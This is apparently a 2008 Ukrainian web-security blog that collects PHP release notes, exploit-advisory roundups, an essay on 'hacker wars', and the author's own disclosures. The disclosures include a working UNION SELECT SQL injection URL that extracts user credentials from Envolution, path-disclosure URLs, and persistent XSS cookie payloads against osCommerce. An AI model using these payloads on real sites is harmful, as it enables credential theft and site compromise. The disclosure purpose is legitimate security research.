Websecurity - Веб безпека

На початку місяця, 07.08.2008, вийшов PHP 4.4.9, у якому виправлений ряд помилок і уразливостей. Даний реліз направлений на покращення безпеки гілки 4.4.x і є останнім релізом для PHP 4.4.

Серед секюріті покращень та виправлень в PHP 4.4.9:

• Обновлений PCRE до версії 7.7.
• Виправлене переповнення в memnstr().
• Виправлений збій в imageloadfont при використанні некоректних шрифтів.
• Виправлена проблема з обробкою open_basedir в розширенні curl.
• Виправлена проблема, коли mbstring.func_overload встановлений в .htaccess ставав глобальним.

По матеріалам http://www.php.net.

21.03.2008

У вересні, 01.09.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

25.08.2008

XSS (IE):

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

В даній добірці експлоіти в веб додатках:

• Joomla Component xsstream-dm 0.01b Remote SQL Injection Exploit (деталі)
• ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability (деталі)
• AJ Dating 1.0 (view_profile.php) Remote SQL Injection Vulnerability (деталі)
• AJ Classifieds 2008 (index.php) Remote SQL Injection Vulnerability (деталі)
• AJ Auction <= 6.2.1 (classifide_ad.php) SQL Injection Vulnerability (деталі)
• AJ Article 1.0 (featured_article.php) Remote SQL Injection Vulnerability (деталі)
• Vortex CMS (index.php pageid) Blind SQL Injection Exploit (деталі)
• QuickUpCMS Multiple Remote SQL Injection Vulnerabilities Exploit (деталі)
• BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities (деталі)
• Exploits ELSE IF CMS Multiple vulnerabilities (деталі)

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та SQL Injection уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/index.php?module=Errore&type=admin&op=noexist&modname=%22
http://site/index.php?module=Errore&type=admin&op=%22
http://site/index.php?module=Errore&type=%22
http://site/index.php?module=%22
http://site/print.php?sid=%22
http://site/modules.php?op=modload&file=%22
http://site/modules.php?op=modload&name=News&file=article&sid=%22
http://site/modules.php?op=modload&name=Recommend_Us&file=index&req=%22
http://site/modules.php?op=modload&name=%22

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,pn_uname,pn_pass,null,null,null,null%20from%20envo_users%20limit%201,1

Уразлива версія Envolution 1.2.0 та попередні версії.

Хакерські війни (Hackers wars) - це війни хакерів за веб сайти. Це новий етап в розвитку Інтернет - коли сайти не тільки створюються, або закриваються (коли вони завершили свою місію), але й завойовуються. Цей варіант став можливим коли, по-перше, накопичилася критична маса сайтів, і коли, по-друге, люди зрозуміли цінність сайтів. Раніше люди захоплювали землі та інші ресурси (й зараз продовжують цим займатися), а в цифровий вік люди почали захоплювати веб сайти.

Ця концепція - хакерські війни - є доволі цікавою, і не тільки для кіноіндустрії (яка могла б зняти фільм на тему хакерських війн), але й для усіх користувачів Інтернет. Тому що вона безпосередньо торкається кожного інтернетчика, зокрема власників сайтів - бо будь-який сайт може стати жертвою хакерської атаки (а то й не одної). А деякі сайти можуть перетворитися на місце бойових дій (коли сайт буде хакатися багатьма хакерами підряд), про що я вже писав в своїх дослідженнях.

Самі ж Інтернет користувачі, що можуть використувавати конкретний сайт, який став жертвою війскових дій, не будуть задоволені коли сайт перестане працювати. І ще менш вони зрадіють, коли на своєму улюбленому сайті вони підхоплять віруса. Тому ця концепція є більш ніж реальною - вона існує вже деякий час і торкається кожного користувача Інтернет.

Можна розрізнити шкідливі й нешкідливі види хакерської діяльності в Інтернет. До шкідливих можна віднести: взломи для дефейсів, взломи для видалення даних, взломи для розміщення шкідливих кодів (фінансово мотивовані взломи), Black SEO взломи (також фінансово мотивовані), взломи для викрадення даних (про які можна й зовсіс не довідатися) та інші. Є також ще DDoS атаки, але вони відносяться до іншої категорії, тому що в даному випадку сайти не взламуються. До нешкідливих можна віднести: взломи з метою попередження про дірки на сайті (що я періодично практикую), а також попередження власників сайтів про взломи їх сайтів (після виявлення факту взлому), в тому числі про інфікованість сайтів шкідливими кодами (що також мені доводилося робити - в цьому році повідомляв деяким власникам сайтів про це).

До хакерських війн безпосередньо відносяться дефейси та видалення даних (більш брутальні взломи ніж дефейси), а також ці два варіанти поєднані з розміщенням шкідливих кодів і/або лінок. Для протидії даним атакам можуть застосовуватися вищезазначені нешкідливі види хакерської діяльності. Але в першу чергу адміни повинні слідкувати за безпекою своїх сайтів.

В липні минулого року була виявлена уразливість в Microsoft Internet Explorer. Про цю уразливість в IE, що може використовуватися для атаки на Firefox, я писав раніше.

Уразливі продукти: Microsoft Internet Explorer 6 та Internet Explorer 7 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista.

Нефільтруються шел-символи при виклику додатків (зокрема Firefox), що відповідають за підтримку різних протоколів.

• CVE-2007-3670 (деталі)
• Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability (деталі)
• Mozilla Foundation Security Advisory 2007-23 (деталі)
• Internet Explorer 0day exploit (деталі)

В даній добірці уразливості в веб додатках:

• Moonware Software Multiple Vulnerabilities (деталі)
• Abledesign Dynamic Picture Frame XSS (деталі)
• InterWorx-CP Multiple HTML Injections Vulnerabilitie (деталі)
• Sunshop v4.0 <= Blind SQL Injection exploit (деталі)
• SQL-ін’єкція в ActiveKB v1.5 (деталі)
• DVD Rental System multiple XSS and CSRF vulnerabilities (деталі)
• Gallery In A Box Username & Password Parameters SQL Injection (деталі)
• Next Gen Portfolio Manager SQL Injection (деталі)
• la-nai cms_v1.2.14 - Remote SQL Injection (деталі)
• PHP remote file inclusion vulnerability in Jupiter CMS 1.1.5 (деталі)

Виявлене переповнення буфера в PCRE. Що могло призвести до виконання довільного коду, або до відмови в обслуговуванні в додатках, які використовують бібліотеку PCRE.

Переповнення буфера відбувалось при компіляції регулярних виразів.

• Updated pcre packages fix vulnerability (деталі)

03.07.2008

У листопаді, 02.11.2007, я знайшов Cross-Site Scripting (причому persistent) в системі osCommerce. Як раз коли виявив уразливість на bezpeka-shop.com, де і використовується цей движок.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.08.2008

XSS:

POST запит на сторінці http://site/shopping_cart.php
<script>alert(document.cookie)</script>В полі Количество.

Після ін’єкції коду, він спрацьовує на кожній сторінці сайта (persistent XSS).

В даній добірці експлоіти в веб додатках:

• HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability (деталі)
• SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit (деталі)
• Ktools PhotoStore 3.4.3 (gallery.php gid) SQL Injection Vulnerability (деталі)
• txtCMS 0.3 (index.php) Local File Inclusion Exploit (деталі)
• Phoenix View CMS <= Pre Alpha2 (SQL/LFI/XSS) Multiple Vulnerabilities (деталі)
• Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit (деталі)
• Ktools PhotoStore <= 3.5.2 Multiple SQL Injection Vulnerabilities (деталі)
• Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability (деталі)
• PhpBlock a8.5 Multiple Remote File Inclusion Vulnerabilities (деталі)
• ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities (деталі)